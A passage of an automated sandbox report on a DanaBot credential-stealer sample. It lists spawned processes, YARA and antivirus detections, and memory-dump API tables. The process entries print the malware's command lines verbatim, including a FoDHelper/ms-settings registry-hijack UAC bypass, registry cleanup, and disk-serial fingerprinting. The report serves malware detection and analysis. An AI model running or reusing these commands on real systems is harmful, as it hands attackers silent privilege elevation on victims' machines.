                                                        Commandline:"C:\Windows\system32\cmd.exe" /c "REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "%TMP%\r.bat" /F && REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F && FoDHelper.exe"
                                                        Imagebase:0x7ff6fe3c0000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:36
                                                        Start time:02:47:57
                                                        Start date:27/12/2024
                                                        Path:C:\Windows\System32\reg.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "C:\Users\user\AppData\Local\Temp\r.bat" /F
                                                        Imagebase:0x7ff6edde0000
                                                        File size:77'312 bytes
                                                        MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:37
                                                        Start time:02:47:57
                                                        Start date:27/12/2024
                                                        Path:C:\Windows\System32\reg.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F
                                                        Imagebase:0x7ff6edde0000
                                                        File size:77'312 bytes
                                                        MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:38
                                                        Start time:02:47:58
                                                        Start date:27/12/2024
                                                        Path:C:\Windows\System32\fodhelper.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:FoDHelper.exe
                                                        Imagebase:0x7ff77fca0000
                                                        File size:49'664 bytes
                                                        MD5 hash:85018BE1FD913656BC9FF541F017EACD
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:39
                                                        Start time:02:47:58
                                                        Start date:27/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\r.bat" "
                                                        Imagebase:0x7ff6fe3c0000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:40
                                                        Start time:02:47:58
                                                        Start date:27/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff620390000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:41
                                                        Start time:02:47:58
                                                        Start date:27/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Local\Temp\r.bat"
                                                        Imagebase:0x7ff6fe3c0000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:42
                                                        Start time:02:47:58
                                                        Start date:27/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff620390000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:43
                                                        Start time:02:47:58
                                                        Start date:27/12/2024
                                                        Path:C:\Users\user\AppData\Roaming\mama.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Users\user\AppData\Roaming\mama.exe
                                                        Imagebase:0x400000
                                                        File size:4'277'248 bytes
                                                        MD5 hash:72B6B07175EF611CE7DAA959A1248AAE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:Borland Delphi
                                                        Yara matches:
                                                        • Rule: JoeSecurity_DanaBot_stealer_dll, Description: Yara detected DanaBot stealer dll, Source: 0000002B.00000003.1621114893.000000007E960000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000002B.00000002.3755043923.0000000002F89000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_DanaBot_stealer_dll, Description: Yara detected DanaBot stealer dll, Source: 0000002B.00000002.3755043923.0000000002F89000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                        Antivirus matches:
                                                        • Detection: 100%, Avira
                                                        • Detection: 100%, Joe Sandbox ML
                                                        • Detection: 71%, ReversingLabs
                                                        Has exited:false

                                                        Target ID:44
                                                        Start time:02:47:59
                                                        Start date:27/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\system32\cmd.exe" /c "REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F && REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F"
                                                        Imagebase:0x7ff6fe3c0000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:45
                                                        Start time:02:47:59
                                                        Start date:27/12/2024
                                                        Path:C:\Windows\System32\reg.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F
                                                        Imagebase:0x7ff6edde0000
                                                        File size:77'312 bytes
                                                        MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:46
                                                        Start time:02:47:59
                                                        Start date:27/12/2024
                                                        Path:C:\Windows\System32\reg.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F
                                                        Imagebase:0x7ff6edde0000
                                                        File size:77'312 bytes
                                                        MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:47
                                                        Start time:02:48:04
                                                        Start date:27/12/2024
                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:cmd.exe /C wmic diskdrive where "DeviceID=\'c:\'" get SerialNumber /value
                                                        Imagebase:0xd70000
                                                        File size:236'544 bytes
                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:48
                                                        Start time:02:48:04
                                                        Start date:27/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff620390000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:49
                                                        Start time:02:48:04
                                                        Start date:27/12/2024
                                                        Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:wmic diskdrive where "DeviceID=\'c:\'" get SerialNumber /value
                                                        Imagebase:0x10000
                                                        File size:427'008 bytes
                                                        MD5 hash:E2DE6500DE1148C7F6027AD50AC8B891
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1289659095.00007FF7C1540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1540000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ff7c1540000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                          • Instruction ID: 316c64d18543aceb3f47ebab1a7df1447ffaddc0d96fa7c8acbfa0f36cccec58
                                                          • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                          • Instruction Fuzzy Hash: AA01677111CB0C4FD784EF0CE451AA5B7E0FB95364F50056DE58AC3661DA36E882CB45
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000003.1615434412.0000016484C92000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000016484C92000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_3_16484c92000_mshta.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0591caa43e104a6314d98fae717a792e3f07944214478e1ced55d508348fa332
                                                          • Instruction ID: ee7cd59ff8546a5ed94c79973da3b98f5abbb0deb47b2e4b2d4fc9cbba480be9
                                                          • Opcode Fuzzy Hash: 0591caa43e104a6314d98fae717a792e3f07944214478e1ced55d508348fa332
                                                          • Instruction Fuzzy Hash: BE11A53050EB845FEB9B5AF8482D3A5BFD4DB52310F4A44EED446CB1E3E90A4CC98351
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000003.1615498313.0000016CFFFE0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000016CFFFE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_3_16cfffe0000_mshta.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                          • Instruction ID: f0f37d9aad708a5ac48ed6416714d88a30e3646a61d1855bdf2b6297b3808b72
                                                          • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                          • Instruction Fuzzy Hash: 6790021449944755D45411D50C453EC5081E388250FD448C0446690244D44E02A651D2
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000003.1615498313.0000016CFFFE0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000016CFFFE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_3_16cfffe0000_mshta.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                          • Instruction ID: f0f37d9aad708a5ac48ed6416714d88a30e3646a61d1855bdf2b6297b3808b72
                                                          • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                          • Instruction Fuzzy Hash: 6790021449944755D45411D50C453EC5081E388250FD448C0446690244D44E02A651D2
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000003.1615498313.0000016CFFFE0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000016CFFFE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_3_16cfffe0000_mshta.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                          • Instruction ID: f0f37d9aad708a5ac48ed6416714d88a30e3646a61d1855bdf2b6297b3808b72
                                                          • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                          • Instruction Fuzzy Hash: 6790021449944755D45411D50C453EC5081E388250FD448C0446690244D44E02A651D2
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.1607109860.00007FF7BFD40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFD40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_7ff7bfd40000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e905bd158df02625dc270cad0cc5a95eb185c14d731b7419937fbf6b616716f3
                                                          • Instruction ID: 5acce6583eb992889cdcf6af75f16a6288386600ce25f71d9aaa3d29d4d203e7
                                                          • Opcode Fuzzy Hash: e905bd158df02625dc270cad0cc5a95eb185c14d731b7419937fbf6b616716f3
                                                          • Instruction Fuzzy Hash: 90425821A0DAC64FE356B77C48751B4BBE1EF57620B8802FAD089C71D7DE18AC56C392
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.1607109860.00007FF7BFD40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFD40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_7ff7bfd40000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 87b9ec4fe9ff98d97744beba33cb57751d593f3429fdf9cc8c6b3615bed487f9
                                                          • Instruction ID: e4101cc7b0183711d9659979136f26c17e31b97e1fadf4a1d7c5925d82a18042
                                                          • Opcode Fuzzy Hash: 87b9ec4fe9ff98d97744beba33cb57751d593f3429fdf9cc8c6b3615bed487f9
                                                          • Instruction Fuzzy Hash: 8241E562E0EEC70BF399B6BC08752F8E6D2AF62A60BD802F9C10DC35D6DE199C145251
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.1607109860.00007FF7BFD40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFD40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_7ff7bfd40000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 07509fd91cc301ae11601d1bbc03625a02211b2d9ffb41340fa734fde2a3a5c1
                                                          • Instruction ID: 373ea2ac0dbaa78ccf8c61ebf86323aa9906672c52253a844c906dc15c932a36
                                                          • Opcode Fuzzy Hash: 07509fd91cc301ae11601d1bbc03625a02211b2d9ffb41340fa734fde2a3a5c1
                                                          • Instruction Fuzzy Hash: 47110B23E0D94A4BB2A8B65C61761FC92C1EFB7A60FC402F6DD0EC3589DE096C8109D2
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.1606377344.00007FF7BFC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFC70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_7ff7bfc70000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                          • Instruction ID: a761a63bfd00b0a1f8064764b54b962c4c127c547928a269d3f40d43862e86d5
                                                          • Opcode Fuzzy Hash: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                          • Instruction Fuzzy Hash: D701A73110CB0C4FD744EF0CE051AA5B3E0FB95360F10052DE58AC3651D732E881CB41
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.1607109860.00007FF7BFD40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFD40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_7ff7bfd40000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e7b0feb34ffcb48b3bab9f346e52c630ea6c3e7091d1349b9f69da35fc7e9b90
                                                          • Instruction ID: 8f7718e05c21971d52c8729b04072e3530c1e36424d4711c28da69bb6c3c218b
                                                          • Opcode Fuzzy Hash: e7b0feb34ffcb48b3bab9f346e52c630ea6c3e7091d1349b9f69da35fc7e9b90
                                                          • Instruction Fuzzy Hash: 9EE0D833E4D8A90EB7A6B5DC242D1F8A2C1EF69A31B8402B7D91DC3149DD009C1043D2
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.1607109860.00007FF7BFD40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFD40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_7ff7bfd40000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b8a09dfe2beeff5de02b28283aa32ef6957fcc90bfe341b1d029d44a6c7a0305
                                                          • Instruction ID: 453705f8de08186833b6b3b186b9949d34a4834ae84b78c0efe2e6fa3b004b81
                                                          • Opcode Fuzzy Hash: b8a09dfe2beeff5de02b28283aa32ef6957fcc90bfe341b1d029d44a6c7a0305
                                                          • Instruction Fuzzy Hash: 5B028A31A0DACA4FD796FB6C84666F4BBE1FF66610B4802FEC14DC7197CA249806C791

                                                          Execution Graph

                                                          Execution Coverage:16.6%
                                                          Dynamic/Decrypted Code Coverage:100%
                                                          Signature Coverage:7.1%
                                                          Total number of Nodes:535
                                                          Total number of Limit Nodes:13

                                                          Control-flow Graph

                                                          APIs
                                                          • LoadLibraryA.KERNEL32(ntdll.dll,NtQueryVirtualMemory), ref: 0343535F
                                                          • GetProcAddress.KERNEL32(00000000,ntdll.dll), ref: 03435365
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002B.00000002.3755043923.0000000002F89000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F70000, based on PE: true
                                                          • Associated: 0000002B.00000002.3754956495.0000000002F70000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000002B.00000002.3755043923.0000000002F71000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000002B.00000002.3755043923.00000000034B1000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000002B.00000002.3755043923.00000000034BD000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_43_2_2f70000_mama.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: NtQueryVirtualMemory$ntdll.dll
                                                          • API String ID: 2574300362-2623246514
                                                          • Opcode ID: 4731a88360ac64b859ae3e3dca95633bdcdba51247b4b59cc755e759f541e5ba
                                                          • Instruction ID: e038cb8088844124e055c38250cf50b75bda3e5ae076daf375e6ad0f2ebd4386
                                                          • Opcode Fuzzy Hash: 4731a88360ac64b859ae3e3dca95633bdcdba51247b4b59cc755e759f541e5ba
                                                          • Instruction Fuzzy Hash: C301A239604208DFD700FFA5E842A4E77E2E74E340F1041A6D8117F78AE77169008F49

                                                          Control-flow Graph

                                                          APIs
                                                          • GetUserDefaultUILanguage.KERNEL32(00000003,?,00000004,00000000,02F7E388,?,?), ref: 02F7E2FA
                                                          • GetLocaleInfoW.KERNEL32(?,00000003,?,00000004,00000000,02F7E388,?,?), ref: 02F7E303
                                                            • Part of subcall function 02F7E190: FindFirstFileW.KERNEL32(00000000,?,00000000,02F7E1EE,?,00000001), ref: 02F7E1C3
                                                            • Part of subcall function 02F7E190: FindClose.KERNEL32(00000000,00000000,?,00000000,02F7E1EE,?,00000001), ref: 02F7E1D3
                                                          Memory Dump Source
                                                          • Source File: 0000002B.00000002.3755043923.0000000002F71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F70000, based on PE: true
                                                          • Associated: 0000002B.00000002.3754956495.0000000002F70000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000002B.00000002.3755043923.0000000002F89000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000002B.00000002.3755043923.00000000034B1000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000002B.00000002.3755043923.00000000034BD000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_43_2_2f70000_mama.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Find$CloseDefaultFileFirstInfoLanguageLocaleUser
                                                          • String ID:
                                                          • API String ID: 3216391948-0
                                                          • Opcode ID: 1dc7ceeafbab51b8d08fc171851058297c98aefa1ed1d6b5a5992b8966d5259c
                                                          • Instruction ID: 439f9f3d5d9079e4fea1a17c5458b011233984a4fbb44f402f04d3984a26ff76
                                                          • Opcode Fuzzy Hash: 1dc7ceeafbab51b8d08fc171851058297c98aefa1ed1d6b5a5992b8966d5259c
                                                          • Instruction Fuzzy Hash: 7B115470A042499BEF04EFA4CD81AEEB7BAEF45744F5044B7E605E7350DB745E04CA61

                                                          Control-flow Graph

                                                          APIs
                                                          • FindFirstFileW.KERNEL32(00000000,?,00000000,02F7E1EE,?,00000001), ref: 02F7E1C3
                                                          • FindClose.KERNEL32(00000000,00000000,?,00000000,02F7E1EE,?,00000001), ref: 02F7E1D3
                                                          Memory Dump Source
                                                          • Source File: 0000002B.00000002.3755043923.0000000002F71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F70000, based on PE: true
                                                          • Associated: 0000002B.00000002.3754956495.0000000002F70000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000002B.00000002.3755043923.0000000002F89000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000002B.00000002.3755043923.00000000034B1000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000002B.00000002.3755043923.00000000034BD000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_43_2_2f70000_mama.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Find$CloseFileFirst
                                                          • String ID:
                                                          • API String ID: 2295610775-0
                                                          • Opcode ID: 6bcbe331e144d43aa334cbcbbabbdec9bf5a639d75f778eac6233a24ef3cb2d0
                                                          • Instruction ID: 15e48fc3453f9eb89fa21e3c2f01457903543819f5370cc940606571fcbc1a2d
                                                          • Opcode Fuzzy Hash: 6bcbe331e144d43aa334cbcbbabbdec9bf5a639d75f778eac6233a24ef3cb2d0
                                                          • Instruction Fuzzy Hash: 9EF0A771940608AFFB50FB74CD5289EB7EDEB493A179105B3FA14E3550EBB49F009914

                                                          Control-flow Graph

                                                          APIs
                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,02F7DFD9,?,?), ref: 02F7DDED
                                                          • RegOpenKeyExW.ADVAPI32(80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,02F7DFD9,?,?), ref: 02F7DE36
                                                          • RegOpenKeyExW.ADVAPI32(80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,02F7DFD9,?,?), ref: 02F7DE58
                                                          • RegOpenKeyExW.ADVAPI32(80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000), ref: 02F7DE76
                                                          • RegOpenKeyExW.ADVAPI32(80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001), ref: 02F7DE94
                                                          • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002), ref: 02F7DEB2
                                                          • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001), ref: 02F7DED0
                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,02F7DFBC,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,02F7DFD9), ref: 02F7DF10
                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,?,00000000,00000000,00000000,?,00000000,02F7DFBC,?,80000001), ref: 02F7DF3B
                                                          • RegCloseKey.ADVAPI32(?,02F7DFC3,00000000,00000000,?,?,?,00000000,00000000,00000000,?,00000000,02F7DFBC,?,80000001,Software\Embarcadero\Locales), ref: 02F7DFB6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002B.00000002.3755043923.0000000002F71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F70000, based on PE: true
                                                          • Associated: 0000002B.00000002.3754956495.0000000002F70000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000002B.00000002.3755043923.0000000002F89000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000002B.00000002.3755043923.00000000034B1000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000002B.00000002.3755043923.00000000034BD000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_43_2_2f70000_mama.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Open$QueryValue$CloseFileModuleName
                                                          • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales$Software\CodeGear\Locales$Software\Embarcadero\Locales
                                                          • API String ID: 2701450724-3496071916
                                                          • Opcode ID: 7107ac1f1fc63704a3e3704081992f3454baecce7d662ce1254cc2dd923bbaef
                                                          • Instruction ID: a9f7573a3a0e035539d026669bfd64ade6491c4137795278660d04ac1004203e
                                                          • Opcode Fuzzy Hash: 7107ac1f1fc63704a3e3704081992f3454baecce7d662ce1254cc2dd923bbaef
                                                          • Instruction Fuzzy Hash: FC51E075A40208BEEB10DAA4CC41FEEB7BDEF18784F9044A7BB04E6191D7B0AA44CA55

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          Memory Dump Source
                                                          • Source File: 0000002B.00000002.3755043923.0000000002F71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F70000, based on PE: true
                                                          • Associated: 0000002B.00000002.3754956495.0000000002F70000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000002B.00000002.3755043923.0000000002F89000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000002B.00000002.3755043923.00000000034B1000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000002B.00000002.3755043923.00000000034BD000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_43_2_2f70000_mama.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c6de23e0481613d32f453ce16a67517bdd3a2f3337e0f07a9c566b82818a8ad4
                                                          • Instruction ID: b7a7f9ebebe544f2b6a5661d2d372995538ca9e19342319ff56c07f1c9182dd4
                                                          • Opcode Fuzzy Hash: c6de23e0481613d32f453ce16a67517bdd3a2f3337e0f07a9c566b82818a8ad4
                                                          • Instruction Fuzzy Hash: C3C14862B00B040BE714AA7CDC8476EB79ADBC47A4F98863FEB55CB395DBA4CC058740

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          APIs
                                                          • Sleep.KERNEL32(00000000,?,02F76274), ref: 02F75A8B
                                                          • Sleep.KERNEL32(0000000A,00000000,?,02F76274), ref: 02F75AA1
                                                          • Sleep.KERNEL32(00000000,?,?,?,02F76274), ref: 02F75ACF
                                                          • Sleep.KERNEL32(0000000A,00000000,?,?,?,02F76274), ref: 02F75AE5
                                                          Memory Dump Source
                                                          • Source File: 0000002B.00000002.3755043923.0000000002F71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F70000, based on PE: true
                                                          • Associated: 0000002B.00000002.3754956495.0000000002F70000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000002B.00000002.3755043923.0000000002F89000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000002B.00000002.3755043923.00000000034B1000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000002B.00000002.3755043923.00000000034BD000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_43_2_2f70000_mama.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID:
                                                          • API String ID: 3472027048-0
                                                          • Opcode ID: dffb3011768bfcca24cfcff7c2c7ed5e7ac71e5351df3f71f0cf46e1039b117a
